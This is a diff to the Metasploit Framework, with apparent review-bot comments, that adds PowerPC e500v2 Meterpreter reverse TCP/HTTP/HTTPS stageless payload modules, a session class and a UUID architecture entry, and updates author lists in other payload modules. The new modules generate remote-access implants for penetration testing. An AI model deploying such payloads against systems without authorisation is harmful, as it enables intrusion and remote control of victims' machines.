'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_ppce500v2_Linux < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'linux' + self.base_arch = ARCH_PPCE500V2 + end +end + +end +end + diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index acc100406a..1a651242e3 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb 
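Review bot: `Meterpreter_ppce500v2_Linux` hard-codes `supports_ssl?` and `supports_zlib?` to `false` without saying why; add `# The e500v2 mettle build presumably ships without TLS/zlib support — confirm against the mettle toolchain` above them (hedged, because the reason is not in the diff) and a blank line between the three method definitions per the style guide. The class references `ARCH_PPCE500V2`, which arrives with the `rex-arch (0.1.13)` bump in Gemfile.lock, but the commit's diffstat shows no change to `metasploit-framework.gemspec`; if the gemspec does not set a matching floor, a fresh `bundle install` that resolves an older rex-arch would load a session class whose constant is undefined, so checking that `rex-arch` is pinned to `>= 0.1.13` there is worth doing.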
@@ -43,7 +43,8 @@ class Msf::Payload::UUID 24 => ARCH_AARCH64, 25 => ARCH_MIPS64, 26 => ARCH_PPC64LE, - 27 => ARCH_R + 27 => ARCH_R, + 28 => ARCH_PPCE500V2 } Platforms = { diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 88c27331ff..3a9e4e3e27 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 70b5b22c3a..d5eda3afaf 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 3c23cfc864..3400e28e34 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, 
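Review bot: `28 => ARCH_PPCE500V2` extends what the hunk header shows to be a table inside `Msf::Payload::UUID`, so the integer keys are presumably a serialized contract rather than arbitrary indices; a comment on the table such as `# IDs are embedded in generated payload UUIDs: append only, never renumber or reuse` would protect the numbering from a later reordering. If the file keeps a reverse lookup or a list of known architectures elsewhere, it needs the same entry; that is outside the hunk and could not be checked.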
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index f4858b8243..bd32104cce 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index 894c078891..073d4b31b3 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 1616b986ec..d2d13aedc0 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 62d9f16d0e..e03945a404 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb 
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 3149bcca28..e31c66b376 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 1243e402de..8bd8a3cc05 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index dd9368b245..10f36f74d8 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb 
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPS64,
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
index 8c34b01940..e0beb782fe 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPS64,
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
index 8e0de4303b..c965638d7e 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPS64,
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
index fdc9ad4109..d1749f9c25 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSBE,
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
index a5db786462..bc1d3f2c08 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSBE,
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
index da8aba961f..cc021b9ff2 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSBE,
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
index 21021201df..a98f452a62 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSLE,
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
index 4bd4e3818e..258bd4192f 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSLE,
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
index 3735553d80..78b4d6b8d7 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_MIPSLE,
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
index c18783c2b3..83aa882cc2 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC,
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
index 651bc9c1b6..9b0c40b47f 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC,
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
index d2771d7a0c..7832e02b38 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC,
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
index 8baaf5149a..d7d893c797 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC64LE,
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
index 8bfe23028d..43922b34f8 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC64LE,
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
index 7f6980e6f7..28f1df859a 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_PPC64LE,
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb
new file mode 100644
index 0000000000..17a4ad60cc
--- /dev/null
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppce500v2_linux'
+
+module MetasploitModule
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook ',
+ 'timwr'
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPCE500V2,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'http',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..345737bb79
--- /dev/null
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppce500v2_linux'
+
+module MetasploitModule
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook ',
+ 'timwr'
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPCE500V2,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'https',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
new file mode 100644
index 0000000000..2de9507578
--- /dev/null
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_ppce500v2_linux'
+
+module MetasploitModule
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse TCP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook ',
+ 'timwr'
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_PPCE500V2,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::Meterpreter_ppce500v2_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {
+ scheme: 'tcp',
+ stageless: true
+ }
+ MetasploitPayloads::Mettle.new('powerpc-e500v2-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
index 2c41b001e2..07d84a9546 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
index a89325ffbb..1b019f6ea9 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
index b5ace9bfeb..d039699b84 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
index 078ea923e9..af7e1d5c24 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X86,
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
index a3f8085c2a..6ce43b87f7 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X86,
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
index 3660fc5810..1f2fb19f4f 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X86,
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
index e522b7c89c..c678a47d9e 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ZARCH,
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
index ae31cc5abe..76be12d28d 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ZARCH,
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
index 5e73f26542..85223495a7 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ZARCH,
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
index cf4c1f6b81..a8d519d10c 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'osx',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
index c4f9172030..07bb971461 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'osx',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
index 82da65b261..d1eeb5d196 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'osx',
 'Arch' => ARCH_X64,
diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb
index 967a051b81..3e3c627562 100755
--- a/tools/modules/generate_mettle_payloads.rb
+++ b/tools/modules/generate_mettle_payloads.rb
@@ -12,18 +12,19 @@ schemes = [
 ]
 arches = [
- ['aarch64','Linux', 'aarch64-linux-musl'],
- ['armbe', 'Linux', 'armv5b-linux-musleabi'],
- ['armle', 'Linux', 'armv5l-linux-musleabi'],
- ['mips64', 'Linux', 'mips64-linux-muslsf'],
- ['mipsbe', 'Linux', 'mips-linux-muslsf'],
- ['mipsle', 'Linux', 'mipsel-linux-muslsf'],
- ['ppc', 'Linux', 'powerpc-linux-muslsf'],
- ['ppc64le','Linux', 'powerpc64le-linux-musl'],
- ['x64', 'Linux', 'x86_64-linux-musl'],
- ['x86', 'Linux', 'i486-linux-musl'],
- ['zarch', 'Linux', 's390x-linux-musl'],
- ['x64', 'OSX', 'x86_64-apple-darwin'],
+ ['aarch64', 'Linux', 'aarch64-linux-musl'],
+ ['armbe', 'Linux', 'armv5b-linux-musleabi'],
+ ['armle', 'Linux', 'armv5l-linux-musleabi'],
+ ['mips64', 'Linux', 'mips64-linux-muslsf'],
+ ['mipsbe', 'Linux', 'mips-linux-muslsf'],
+ ['mipsle', 'Linux', 'mipsel-linux-muslsf'],
